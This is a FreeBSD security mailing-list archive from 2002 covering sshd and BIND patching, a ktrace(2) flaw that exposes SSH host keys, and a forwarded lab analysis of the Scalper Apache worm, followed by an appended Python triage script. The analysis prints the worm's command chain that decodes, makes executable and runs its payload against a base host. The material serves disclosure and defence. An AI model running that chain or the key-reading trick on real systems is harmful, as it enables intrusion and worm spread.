From owner-freebsd-security Sun Jun 30 3:30:35 2002
From: Dag-Erling Smorgrav
Date: 30 Jun 2002 12:30:26 +0200
To: Scott Gerhardt
Cc: FreeBSD
Subject: Re: Patching sshd

Scott Gerhardt writes:
> Trying to patch my system for fix this apparent sshd vulnerability.
>
> I tried patching my 4.5-Release box as outlined in #2 below with no luck.

That patch is for a different hole.  Check the date on the SA.
DES
--
Dag-Erling Smorgrav - des@ofug.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jun 30 5:46:59 2002
From: Andy Farkas
Date: Sun, 30 Jun 2002 22:46:37 +1000 (EST)
To: Kent Stewart
Subject: Re: FreeBSD.Scalper.Worm

On Sat, 29 Jun 2002, Kent Stewart wrote:

> One of the people sending mail to -docs, pointed me to
>
> http://securityresponse.symantec.com/avcenter/venc/data/freebsd.scalper.worm.html
>
> It looks like more exposure needs to be provided via the web site and etc.
>
> Kent
>
> --
> Kent Stewart
> Richland, WA
>
> http://users.owt.com/kstewart/index.html
>

Looks like this worm can be stopped by having /tmp mounted noexec.
--

:{ andyf@speednet.com.au

Andy Farkas
System Administrator
Speednet Communications
http://www.speednet.com.au/

From owner-freebsd-security Sun Jun 30 7:17: 5 2002
From: Benjamin Krueger
Date: Sun, 30 Jun 2002 07:18:03 -0700
To: Andy Farkas
Cc: Kent Stewart, security@FreeBSD.ORG
Subject: Re: FreeBSD.Scalper.Worm

* Andy Farkas (andyf@speednet.com.au) [020630 05:51]:
> On Sat, 29 Jun 2002, Kent Stewart wrote:
>
> > One of the people sending mail to -docs, pointed me to
> >
> > http://securityresponse.symantec.com/avcenter/venc/data/freebsd.scalper.worm.html
> >
> > It looks like more exposure needs to be provided via the web site and etc.
> >
> > Kent
> >
> > --
> > Kent Stewart
> > Richland, WA
> >
> > http://users.owt.com/kstewart/index.html
> >
>
> Looks like this worm can be stopped by having /tmp mounted noexec.

Or running a non-vulnerable version of Apache.

> --
>
> :{ andyf@speednet.com.au
>
> Andy Farkas
> System Administrator
> Speednet Communications
> http://www.speednet.com.au/

--
Benjamin Krueger

"Life is far too important a thing ever to talk seriously about."
- Oscar Wilde (1854 - 1900)
----------------------------------------------------------------
Send mail w/ subject 'send public key' or query for (0x251A4B18)
Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18

From owner-freebsd-security Sun Jun 30 7:28:51 2002
From: Steve Shorter
Date: Sun, 30 Jun 2002 10:23:39 -0400
To: "Sean J. Schluntz"
Cc: freebsd-security@freebsd.org
Subject: Re: Security Check Diffs Question

On Sat, Jun 29, 2002 at 02:48:57AM -0700, Sean J. Schluntz wrote:
>
> Problem with that is it doesn't work in commercial environments unless
> you pay the fee for the commercial version of Tripwire. (excepting
> the freeware version for Linux only Tripwire) the public tripwire
> is only legal to put one copy on your network.

Huh? The opensource version is GPL'd. Builds no problem on FreeBSD.
The latest might even be in ports.
-steve

From owner-freebsd-security Sun Jun 30 7:54:58 2002
From: Kent Stewart
Date: Sun, 30 Jun 2002 07:54:45 -0700
To: Benjamin Krueger
Cc: Andy Farkas, security@FreeBSD.ORG
Subject: Re: FreeBSD.Scalper.Worm

Benjamin Krueger wrote:

> * Andy Farkas (andyf@speednet.com.au) [020630 05:51]:
>
>>On Sat, 29 Jun 2002, Kent Stewart wrote:
>>
>>
>>>One of the people sending mail to -docs, pointed me to
>>>
>>>http://securityresponse.symantec.com/avcenter/venc/data/freebsd.scalper.worm.html
>>>
>>>It looks like more exposure needs to be provided via the web site and etc.
>>>
>>>Kent
>>>
>>>
>>Looks like this worm can be stopped by having /tmp mounted noexec.
>>
>
> Or running a non-vulnerable version of Apache.

That was my choice. I also upgraded from 1.3.24 to 2.0.39.
I figured that it was time. I checked with people I knew and one of them
had not upgraded Apache. He had waited until an application to take
advantage of Apache's hole and targeting FreeBSD had arrived. I figure
there are more.

Kent.

--
Kent Stewart
Richland, WA

http://users.owt.com/kstewart/index.html

From owner-freebsd-security Sun Jun 30 10:24:57 2002
From: Alessandro de Manzano
Date: Sun, 30 Jun 2002 19:24:40 +0200
To: Doug Barton
Cc: John Long, security@FreeBSD.org
Subject: Re: named 8.3.2-T1B vulnerable?
Reply-To: Alessandro de Manzano

On Sat, Jun 29, 2002 at 05:15:42PM -0700, Doug Barton wrote:

Hi!

> should be using 8.3.3 if you're using BIND 8. You can build the bind8 port
> with:
>
> make clean ; make -DPORT_REPLACES_BASE_BIND8 install
>
> and it will update the version of BIND on your system. You could also
> leave off the flag if you'd rather have the new bind in /usr/local, but
> 8.3.2-T1B had some icky bugs so I recommend just writing over it to be
> safe.

I've a question about replacing with PORT_REPLACES_BASE_BIND8.

If today I install BIND 8.3.3 from the port with that option it will
overwrite the system one but next time I'll do a buildworld /
installworld I'll get again 8.3.2-T1B or whatever RELENG_4(_6) will
have that time.. right ?

More, I'll get an entry in the installed packages database for BIND
8.3.3 that is "dangerous", since if I'll ever pkg_delete it I'll lost
the real/overwritten BIND...

Is possible to "make install" it without making an entry in pkgdb ?

> to RELENG_4. I doubt that the security officer team will want to import
> BIND 8.3.3 into any of the RELENG_4_x branches. The port will do the same

I'll hope yes, since the security fixes are important, IMHO...

Thanks in advance !

--
bye!
Ale

From owner-freebsd-security Sun Jun 30 11: 9:29 2002
From: "Jeff Ito"
Date: Sun, 30 Jun 2002 14:09:42 -0400
Cc: "Alessandro de Manzano"
Subject: Re: named 8.3.2-T1B vulnerable?

> I've a question about replacing with PORT_REPLACES_BASE_BIND8.
>
> If today I install BIND 8.3.3 from the port with that option it will
> overwrite the system one but next time I'll do a buildworld /
> installworld I'll get again 8.3.2-T1B or whatever RELENG_4(_6) will
> have that time.. right ?
Yes, see /etc/make.conf to prevent this

#NO_BIND= true # do not build BIND

> More, I'll get an entry in the installed packages database for BIND
> 8.3.3 that is "dangerous", since if I'll ever pkg_delete it I'll lost
> the real/overwritten BIND...
>
> Is possible to "make install" it without making an entry in pkgdb ?
>

pkg_add has -R, I'm not certain about doing the same with make install,
but you can always delete the entry from /var/db/pkg/

--
>
> bye!
>
> Ale
>

HTH,
Jeff

From owner-freebsd-security Sun Jun 30 11:17:31 2002
From: Darren Reed
Date: Mon, 1 Jul 2002 04:17:22 +1000 (Australia/ACT)
To: security@freebsd.org
Subject: security risk: ktrace(2) in FreeBSD prior to -current.

The bug in ktrace(2) is present in all FreeBSD's that don't have
p_candebug() in the kernel. In short, this is 4-stable, etc.

What's the risk ?

With OpenSSH 3.4, ssh-keysign gets installed setuid-root.
Using the ktrace(2) bug, you can ktrace the ssh-keysign process after
it resets its uid's and watch it read your ssh host keys, be they RSA
or DSA.

I'm working on a patch for FreeBSD that doesn't break either FreeBSD
or ktrace(2) working the way it should.

In the meantime:

chmod 555 `which ssh-keysign`

Darren

From owner-freebsd-security Sun Jun 30 13: 8:16 2002
From: Alessandro de Manzano
Date: Sun, 30 Jun 2002 22:01:18 +0200
To: Jeff Ito
Cc: security@freebsd.org
Subject: Re: named 8.3.2-T1B vulnerable?
Reply-To: Alessandro de Manzano

On Sun, Jun 30, 2002 at 02:09:42PM -0400, Jeff Ito wrote:

> see /etc/make.conf to prevent this
>
> #NO_BIND= true # do not build BIND

yeah, I forgot it ;)

> > Is possible to "make install" it without making an entry in pkgdb ?
> >
>
> pkg_add has -R, I'm not certain about doing the same with make install,
> but you can always delete the entry from /var/db/pkg/

mmm... yes, better than nothing :)
I'll do so, I'll install port bind 8.3.3 over system bind and I'll
'remove' its package info from /var/db/pkg

many thanks!

--
bye!
Ale

From owner-freebsd-security Sun Jun 30 13:37:10 2002
From: Doug Barton
Date: Sun, 30 Jun 2002 13:37:03 -0700
To: Alessandro de Manzano
Cc: John Long, security@FreeBSD.org
Subject: Re: named 8.3.2-T1B vulnerable?

Alessandro de Manzano wrote:

> I've a question about replacing with PORT_REPLACES_BASE_BIND8.
>
> If today I install BIND 8.3.3 from the port with that option it will
> overwrite the system one but next time I'll do a buildworld /
> installworld I'll get again 8.3.2-T1B or whatever RELENG_4(_6) will
> have that time.. right ?

Correct. There is currently a make.conf option for NO_BIND.
In addition, some of us are working on a more thorough solution which will
add some magic to the bsd.*.mk files so that you can put
PORT_REPLACES_BASE_FOO in your /etc/make.conf, and it will automatically
imply NO_FOO as well. Currently I'm testing a final buildworld for the
bind 8.3.3 import on -current. Once that's done, I'll be sending some
patches and more info on this topic to the freebsd-arch mailing list.

> More, I'll get an entry in the installed packages database for BIND
> 8.3.3 that is "dangerous", since if I'll ever pkg_delete it I'll lost
> the real/overwritten BIND...

Yep. One of the things I'm adding to my little patch is to change the
name of the port from foo-version to foo-system-version when installing
to give you a clue as to what's about to happen. BUT, you are absolutely
right in saying that this option is dangerous. However, there are lots
of ways to shoot yourself in the foot here... it's up to you to find a
better target. :) Also, the system will still run without BIND, unless
of course you're using that particular system as a name server. I have
been using the "port overwrites base" stuff at Yahoo! for almost a year,
and we haven't had any catastrophes yet.
Hope this helps,

Doug

From owner-freebsd-security Sun Jun 30 13:47:57 2002
From: Doug Barton
Date: Sun, 30 Jun 2002 13:47:51 -0700
To: John Long
Cc: security@FreeBSD.ORG
Subject: Re: named 8.3.2-T1B vulnerable?

John Long wrote:

> Hello Doug, thanks for the very quick response,

Glad to help.

> Yes I run 2 primary dns servers
> I would rather overwrite the base however is there any downside to this,
> now or in the future with the next build world... ?

Downside to it? I hope not, I've done it at Yahoo! for almost a year
now. :) You should also put 'NO_BIND= true' in your /etc/make.conf to
avoid spamming bind on your next buildworld. I left that part out of my
previous message, sorry.
> With 8.3.2-T1B being so icky, should this subject not be mentioned on the
> stable
> list and is it not a security problem/potential root hole ( I am sure black
> hats are
> very busy right now) therefore should it not go into RELENG_4_6 as a -p2?

Well, let's be clear. The exploitable parts of the problem are in libc
(fixed already) and in libbind from the BIND sources. The latter is
seldom, if ever used. I'll leave it up to the SO team to decide, I have
no objection to doing the import.

However, the main ickiness of that code is performance wise. In fixing
some old bugs in 8.3.1, they introduced a few "quirks" that were
subsequently fixed before 8.3.2-release. I had some servers testing
8.3.2-prior-to-release code, and they all fell over in various
interesting ways. The bugs were fixed before I got around to reporting
them though.

My personal belief is that people who are actually running name servers
should be keeping up with such things, and therefore my saying, "Hey,
the code in the base isn't the latest, and isn't recommended, so you
should use the port to upgrade" really SHOULD be redundant.... but in
the real world, you're probably right.

> Finally thanks to all the people/coders involved with open source and
> FreeBSD :-)

You're welcome. :) Thanks for the kind words... it's actually quite nice
to hear once in a while.
Doug

From owner-freebsd-security Sun Jun 30 13:59: 1 2002
From: Alessandro de Manzano
Date: Sun, 30 Jun 2002 22:58:43 +0200
Reply-To: Alessandro de Manzano
To: Doug Barton
Cc: John Long, security@FreeBSD.org
Subject: Re: named 8.3.2-T1B vulnerable?

On Sun, Jun 30, 2002 at 01:37:03PM -0700, Doug Barton wrote:

> Correct. There is currently a make.conf option for NO_BIND. In

yes, I knew it but I totally forgot about it ;)

> addition, some of us are working on a more thorough solution which will
> add some magic to the bsd.*.mk files so that you can put
> PORT_REPLACES_BASE_FOO in your /etc/make.conf, and it will automatically
> imply NO_FOO as well. Currently I'm testing a final buildworld for the

yup, should be useful :-)

> > More, I'll get an entry in the installed packages database for BIND
> > 8.3.3 that is "dangerous", since if I'll ever pkg_delete it I'll lost
> > the real/overwritten BIND...
>
> Yep. One of the things I'm adding to my little patch is to change the
> name of the port from foo-version to foo-system-version when installing
> to give you a clue as to what's about to happen. BUT, you are absolutely

IMHO the current system of -DSOMETHING is good, maybe just a couple of
suggestions: use a standard name (PORT_REPLACES_BASE_xxx as you said),
maybe it's already this way, I don't know :)) and/or a dialog(1) menu to
choose whether overwrite base components or not :)

Sometimes people 'forgot' to read into Makefiles to look for every
possible -D symbols..

> right in saying that this option is dangerous. However, there are lots
> of ways to shoot yourself in the foot here... it's up to you to find a
> better target. :) Also, the system will still run without BIND, unless

yes, of course :) you're right

> of course you're using that particular system as a name server. I have

a couple boxes of mine are actually public name servers, so I'll
absolutely upgrade them to 8.3.3 tomorrow morning.
This evening I upgraded my home box in this way to learn :)

> been using the "port overwrites base" stuff at Yahoo! for almost a year,
> and we haven't had any catastrophes yet.
>
> Hope this helps,

Yes, definitely! Thanks a lot ! :-)

--
bye!
Ale

From owner-freebsd-security Sun Jun 30 15:26:17 2002
From: "Kurt Seifried"
Date: Sun, 30 Jun 2002 16:25:48 -0600
Reply-To: "Kurt Seifried"
Subject: Apache Worm Analysis (was Re: Apache worm in the wild)

Forwarded by request.

-----Original Message-----
From: David Endler [mailto:dendler@idefense.com]
Sent: Sunday, June 30, 2002 2:09 PM
To: bugtraq@securityfocus.com; freebsd-security@freebsd.org
Subject: Apache Worm Analysis (was Re: Apache worm in the wild)

Based on the Bugtraq posted code from Domas Mituzas
(http://dammit.lt/apache-worm/apache-worm.c), iDEFENSE Labs performed
an initial analysis in a closed lab environment.
The lab environment consisted of the following machines and applications:

Host: wormbait
Running fresh FreeBSD 4.5 x86 standard installation with Apache 1.3.20
default installation, lsof 4.64, and Tripwire 2.3.1-2
IP address 172.16.159.100
% uname -a
FreeBSD attacker 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002

Host: attacker
Running fresh FreeBSD 4.5 x86 standard installation, lsof 4.64, and
Tripwire 2.3.1-2
IP address 172.16.159.57
% uname -a
FreeBSD attacker 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002

Host: sniffer
Redhat Linux 7.1 fully patched
Passive network interface (no assigned IP address) in promiscuous mode
with Ethereal and TCPdump

PREPARATION

The worm was compiled on the attacker host into a binary named .a:

% gcc apache_code.c -o .a
% mv .a /tmp
% ls -l /tmp
total 52
-rwxr-xr-x 1 nobody wheel 51598 Jun 29 17:49 .a

The worm's author hardcoded several features into the code, which make
for shortcomings in the propagation routine. The worm binary MUST be
named ".a" and be placed in the /tmp directory or else it cannot infect
other hosts. If the binary is removed at any time from the /tmp
directory while the worm is running in the background, it will only be
able to upload blank benign copies of itself to future exploited hosts.
Any FreeBSD installations that have the /tmp directory as a separate
partition and have set the noexec flag will prevent the worm from
scanning other hosts assuming the system has been infected.

The following sections have been organized into the lifecycle of this
worm:

Listen for UDP packets -> Scan for new hosts -> Exploit found hosts ->
Transfer payload to victim -> Launch new host -> Listen for UDP packets
-> ...

LISTEN

The worm requires at least one argument to be run from the command
line, although in most cases it will be automatically launched in
future infection scenarios:

% ./a /tmp/.a [base 2] ...
The "base" argument is an IP address or hostname of the system that originally infected the attacker. The attacking computer (that has just been infected) sends a UDP packet to this base host and requires a response in the form of two UDP packets in order to launch. It is unclear why the author designed the worm to wait for these response packets before running.

The following is the TCPdump packet that the attacker would send to the host that originally infected it. For the purposes of the analysis, we used the attacker as its own base host to start the scenario. Extrapolating from the log data, the initial packet looks like the following:

15:51:29.967989 attacker.2001 > base_host.2001: [udp sum ok] udp 16 (ttl 64, id 5868, len 44)
    4500 002c 16ec 0000 4011 cd16 ac10 9f64
    ac10 9f39 07d1 07d1 0018 e95c 7000 0000
    0000 0000 0000 0000 0000 0000

The base host must then send a response back to the newly infected attacker consisting of two UDP packets or else the worm will not begin scanning for new hosts. However, even if the responses are not received from the base host, the worm continues to listen on UDP port 2001. From source code analysis, it seems the UDP server is rather benign and does not provide backdoor Trojan capabilities, although it is extremely feasible that future variants may integrate that feature.
Running netstat will show the listening port on an infected FreeBSD host as the "wizard" service, which is assigned to port 2001 in most /etc/services files: Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 0 *.smtp *.* LISTEN tcp4 0 0 *.ssh *.* LISTEN tcp46 0 0 *.ssh *.* LISTEN tcp4 0 0 *.ftp *.* LISTEN udp4 0 0 *.syslog *.* udp4 0 0 *.wizard *.* udp6 0 0 *.syslog *.* Active UNIX domain sockets Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr c8ec7ec0 dgram 0 0 0 c8e97fc0 0 c8ec7e80 c8ec7e80 dgram 0 0 0 c8e97fc0 0 c8ec7f80 c8ec7f80 dgram 0 0 0 c8e97fc0 0 c8ec7fc0 c8ec7fc0 dgram 0 0 0 c8e97fc0 0 0 c8e97fc0 dgram 0 0 c8e92cc0 0 c8ec7ec0 0 Running lsof shows the following files and sockets being accessed by the worm (the last ten lines): % lsof adjkerntz 17 root txt VREG 116,131072 62264 42241 /sbin/adjkerntz syslogd 55 root 3u unix 0xc8520ec0 0t0 /var/run/log syslogd 55 root 9w VREG 116,131072 30522 253467 /var/log/messages syslogd 55 root 10w VREG 116,131072 0 253468 /var/log/security syslogd 55 root 11w VREG 116,131072 1573 253465 /var/log/maillog syslogd 55 root 12w VREG 116,131072 0 253464 /var/log/lpd-errs syslogd 55 root 13w VREG 116,131072 6233 253462 /var/log/cron syslogd 55 root 14w VREG 116,131072 0 253469 /var/log/slip.log syslogd 55 root 15w VREG 116,131072 0 253470 /var/log/ppp.log inetd 62 root txt VREG 116,131072 27088 212720 /usr/lib/libwrap.so.3 cron 64 root cwd VDIR 116,131072 512 253453 /var/cron cron 64 root 3uW VREG 116,131072 3 265182 /var/run/cron.pid sshd 66 root txt VREG 116,131072 121320 216910 /usr/lib/libasn1.so.3 sshd 66 root txt VREG 116,131072 27088 212720 /usr/lib/libwrap.so.3 sshd 66 root txt VREG 116,131072 34664 212691 /usr/lib/libpam.so.1 sendmail 70 root cwd VDIR 116,131072 512 253482 /var/spool/mqueue sendmail 70 root rtd VDIR 116,131072 512 2 / sendmail 70 root txt VREG 116,131072 403136 214274 /usr/libexec/sendmail/sendmail sendmail 70 root txt VREG 
116,131072 76560 214314 /usr/libexec/ld-elf.so.1 sendmail 70 root txt VREG 116,131072 32912 212616 /usr/lib/libutil.so.3 sendmail 70 root txt VREG 116,131072 27088 212720 /usr/lib/libwrap.so.3 sendmail 70 root txt VREG 116,131072 177160 216844 /usr/lib/libssl.so.2 sendmail 70 root txt VREG 116,131072 762068 216836 /usr/lib/libcrypto.so.2 sendmail 70 root txt VREG 116,131072 573760 212628 /usr/lib/libc.so.4 sendmail 70 root 0r VCHR 2,2 0t0 232339 /dev/null sendmail 70 root 1w VCHR 2,2 0t0 232339 /dev/null sendmail 70 root 2w VCHR 2,2 0t0 232339 /dev/null sendmail 70 root 3u unix 0xc8520b00 0t0 - >0xc8520ec0 sendmail 70 root 4u IPv4 0xc85dcc60 0t0 TCP *:smtp (LISTEN) sendmail 70 root 5u IPv4 0xc85dca40 0t0 TCP *:submission (LISTEN) login 90 root txt VREG 116,131072 34664 212691 /usr/lib/libpam.so.1 login 90 root txt VREG 116,131072 4024 212687 /usr/lib/pam_skey.so login 90 root txt VREG 116,131072 3208 212683 /usr/lib/pam_cleartext_pass_ok.so login 90 root txt VREG 116,131072 4828 212689 /usr/lib/pam_unix.so login 90 root txt VREG 116,131072 3436 212685 /usr/lib/pam_permit.so login 91 root txt VREG 116,131072 34664 212691 /usr/lib/libpam.so.1 login 91 root txt VREG 116,131072 4024 212687 /usr/lib/pam_skey.so login 91 root txt VREG 116,131072 3208 212683 /usr/lib/pam_cleartext_pass_ok.so login 91 root txt VREG 116,131072 4828 212689 /usr/lib/pam_unix.so login 91 root txt VREG 116,131072 3436 212685 /usr/lib/pam_permit.so login 92 root txt VREG 116,131072 34664 212691 /usr/lib/libpam.so.1 login 92 root txt VREG 116,131072 4024 212687 /usr/lib/pam_skey.so login 92 root txt VREG 116,131072 3208 212683 /usr/lib/pam_cleartext_pass_ok.so login 92 root txt VREG 116,131072 4828 212689 /usr/lib/pam_unix.so login 92 root txt VREG 116,131072 3436 212685 /usr/lib/pam_permit.so csh 98 root cwd VDIR 116,131072 512 244353 /usr/local/apache/logs csh 100 root 3u PIPE 0xc8e81d40 16384 - >0xc8e81a20 csh 100 root 4u PIPE 0xc8e81a20 16384 - >0xc8e81d40 httpd 106 root txt VREG 116,131072 
471064 244356 /usr/local/apache/bin/httpd httpd 106 root 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 106 root 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 106 root 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 565 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 565 nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 565 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 565 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 585 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 585 nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 585 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 585 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 741 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 741 nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 741 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 741 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 768 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 768 nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 768 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 768 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 905 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 905 nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 905 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 905 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log httpd 1011 nobody txt VREG 116,131072 471064 244356 /usr/local/apache/bin/httpd httpd 1011 
nobody 2w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 1011 nobody 15w VREG 116,131072 2698 244751 /usr/local/apache/logs/error_log httpd 1011 nobody 17w VREG 116,131072 1217 244752 /usr/local/apache/logs/access_log .a 1103 root cwd VDIR 116,131072 512 274560 /tmp .a 1103 root rtd VDIR 116,131072 512 2 / .a 1103 root txt VREG 116,131072 51598 286300 /tmp/.a .a 1103 root txt VREG 116,131072 76560 214314 /usr/libexec/ld-elf.so.1 .a 1103 root txt VREG 116,131072 573760 212628 /usr/lib/libc.so.4 .a 1103 root 0u VCHR 2,2 0t0 232339 /dev/null .a 1103 root 1u VCHR 2,2 0t0 232339 /dev/null .a 1103 root 2u VCHR 2,2 0t0 232339 /dev/null .a 1103 root 3u VCHR 2,2 0t0 232339 /dev/null .a 1103 root 4u IPv4 0xc857ebc0 0t0 UDP *:wizard At any time, the owner of an infected computer can determine the original base host that infected it simply by looking at the process list: % ps aux | grep ".a" nobody 1103 0.0 0.4 932 444 v1 S 6:46PM 0:00.00 /tmp/.a 172.16.159.57 The required response packets by the waiting attacker from the base host look something like this in a TCPdump capture: 15:51:29.970308 base_host.2001 > attacker.2001: [udp sum ok] udp 20 (ttl 64, id 7130, len 48) 4500 0030 1bda 0000 4011 c824 ac10 9f39 ac10 9f64 07d1 07d1 001c 9adf 7300 0000 0000 0000 0000 0000 0000 0000 ac10 9f64 15:51:29.970626 base_host.2001 > attacker.2001: [udp sum ok] udp 24 (ttl 64, id 7131, len 52) 4500 0034 1bdb 0000 4011 c81f ac10 9f39 ac10 9f64 07d1 07d1 0020 498d 7100 0000 0000 0000 0800 0000 0000 0000 ac10 9f64 ac10 9f39 SCAN Once the attacker's worm receives these packets on the UDP server listening on port 2001, the worm begins to scan random class B IP address ranges for Apache web servers. iDEFENSE Labs modified the code slightly so it would instantly start scanning on the same class B (172.16.159.x) that the wormbait host was on. 
In order to find an active Apache web server, it sends the following web request:

GET / HTTP/1.1

This request will show up in the victim's Apache access logs as the following:

172.16.159.57 - - [29/Jun/2002:15:06:41 -0400] "GET / HTTP/1.1" 400 378

More importantly, the request will also show up in the Apache error logs since a proper "Host:" header is not included, as seen here:

[Sat Jun 29 15:06:41 2002] [error] [client 172.16.159.57] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /

EXPLOIT

When the worm receives the results of the HTTP response, it determines if the web server is running Apache by using a simple string compare function on the word "Apache". Regardless of version, the worm will try the two memory offsets to use in the chunked-encoding exploit for the respective targets of Apache 1.3.20 or 1.3.22-24. The exploit seems to use the exact same shellcode as the apache_nosejob.c posted by GOBBLES. iDEFENSE Labs also tested the worm on Apache 1.3.24 with the same successful exploitation results. The attacker then sends the chunked-encoding exploit over HTTP to the vulnerable Apache server, which looks something like this when reconstructed from the sniffer data:

http://www.idefense.com/idtools/Apache%20Worm.txt

TRANSFER

Upon successful exploitation, the worm is able to upload a uuencoded copy of itself named ".uua" to the victim's /tmp directory. UUencode is a popular software utility used to translate mostly binary file types into a 7-bit ASCII set of characters so that they can be attached to an e-mail message or posted to a newsgroup. The worm (while still issuing commands through the buffer overflow exploit to the victim) issues a uudecode command through the established HTTP socket to extract the file into the .a binary.
A user on an infected host would see the following two files in the /tmp directory:

% ls -la /tmp
total 122
-rwxr-xr-x 1 nobody wheel 51598 Jun 29 17:49 .a
-rw-r--r-- 1 nobody wheel 71113 Jun 29 17:49 .uua

The attacker then executes the .a binary on the victim's host causing the cycle to be completed. The actual command stream that causes the last few events to occur is sent into the HTTP stream by the attack into the shell that results from successful exploitation of the chunked-encoding vulnerability:

/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;killall -9 .a;chmod +x /tmp/.a;killall -9 .a;/tmp/.a 172.16.159.57

The above sequence of commands stops all previous infected versions of the worm from running, since it's possible for multiple reinfections to occur from different originating hosts.

ANALYSIS:

This worm is just another component of the general vulnerability disclosure trend. When a vulnerability is first discovered, the vendor of the vulnerable software or hardware is often notified first. However, the time between disclosure and a proof-of-concept exploit is narrowing, as is the time between the disclosure of the exploit and the creation of the worm. And the trend will continue during the year(s) to come. This particular vulnerability in Apache's chunked encoding was publicly disclosed on June 17, 2002; an exploit was disclosed on June 19; this worm was discovered in the wild on June 28. Even though the range of exploitable applications and platforms was quite limited this time (FreeBSD only), it is extremely likely now that others will emerge given the source code is now publicly available.

This worm was programmed in C in a rather sloppy fashion in what almost seems to have been a preexisting worm skeleton. Many of the functions and routines in the code are never called or used at all. It is almost as if these sections (such as the e-mail component and logging feature) were never fully configured properly.
In fact, this seems more like a proof-of-concept worm since it causes no damage, barring any indirect denial of service or system resource overconsumption. While this worm is somewhat benign in its payload, administrators should take caution as there are many others who can easily construct more destructive worms and release them in the wild with minimal technical expertise.

DETECTION:

Only FreeBSD 4.5 installations are affected currently. Look for the existence of the .a and .uua files in the /tmp directory, a UDP server running on port 2001, or many outbound web connections that are shown when running netstat.

RECOVERY:

Simply delete the files .a and .uua in the /tmp directory, and kill the worm process:

% ps aux | grep ".a"
nobody 1103 0.0 0.4 932 444 v1 S 6:46PM 0:00.00 /tmp/.a 172.16.159.57
% kill -9 1103

VENDOR FIX:

Administrators should download and install HTTP Server 1.3.26, which corrects the chunked-encoding problem. It is available at http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz.
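
Added example (not part of the iDEFENSE analysis or of the list traffic): a Python triage routine for the indicators named under DETECTION, run over text captured from ls, netstat and ps plus the two Apache logs. The sample data reuses lines quoted in the analysis; the outbound connection lines, the benign access-log line and the threshold of 20 connections are constructed assumptions.

```python
import re
from collections import Counter

WORM_FILES = {".a", ".uua"}      # names the analysis reports in /tmp
WORM_PORTS = {"2001", "wizard"}  # UDP 2001; netstat shows it as "wizard"
HTTP_PORTS = {"80", "http"}

# The Host-less probe as logged by the victim's Apache (formats from the analysis).
# Other clients also send such requests, so this is a weak indicator on its own.
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET / HTTP/1\.1" 400 ')
ERROR_RE = re.compile(
    r"\[client ([^\]]+)\] client sent HTTP/1\.1 request without hostname")


def _port(addr):
    """BSD netstat prints address.port; return the text after the last dot."""
    return addr.rsplit(".", 1)[-1]


def tmp_artifacts(ls_output):
    """Worm file names present in `ls -la /tmp` output."""
    rows = map(str.split, ls_output.splitlines())
    return sorted({r[-1] for r in rows if len(r) >= 9 and r[-1] in WORM_FILES})


def netstat_indicators(netstat_output):
    """Return (UDP 2001 socket present, count of TCP sockets to remote port 80)."""
    listener, outbound = False, 0
    for row in map(str.split, netstat_output.splitlines()):
        if len(row) < 5:
            continue
        proto, local, foreign = row[0], row[3], row[4]
        if proto.startswith("udp") and _port(local) in WORM_PORTS:
            listener = True
        elif proto.startswith("tcp") and _port(foreign) in HTTP_PORTS:
            outbound += 1
    return listener, outbound


def worm_processes(ps_output):
    """(pid, base host) for each process run as /tmp/.a in `ps aux` output."""
    hits = []
    for row in map(str.split, ps_output.splitlines()):
        if len(row) > 1 and "/tmp/.a" in row and row[1].isdigit():
            i = row.index("/tmp/.a")
            hits.append((int(row[1]), row[i + 1] if i + 1 < len(row) else None))
    return hits


def scan_probes(access_lines, error_lines):
    """Clients whose probe appears in both logs, with their error-log hit count."""
    probed = {m.group(1) for m in map(ACCESS_RE.match, access_lines) if m}
    hits = Counter(m.group(1) for m in map(ERROR_RE.search, error_lines)
                   if m and m.group(1) in probed)
    return dict(hits)


def triage(ls_out, netstat_out, ps_out, access_lines, error_lines,
           outbound_threshold=20):  # assumed cut-off for "many" connections
    listener, outbound = netstat_indicators(netstat_out)
    return {
        "tmp_files": tmp_artifacts(ls_out),
        "udp_2001": listener,
        "many_outbound_http": outbound >= outbound_threshold,
        "processes": worm_processes(ps_out),
        "probes_seen": scan_probes(access_lines, error_lines),
    }


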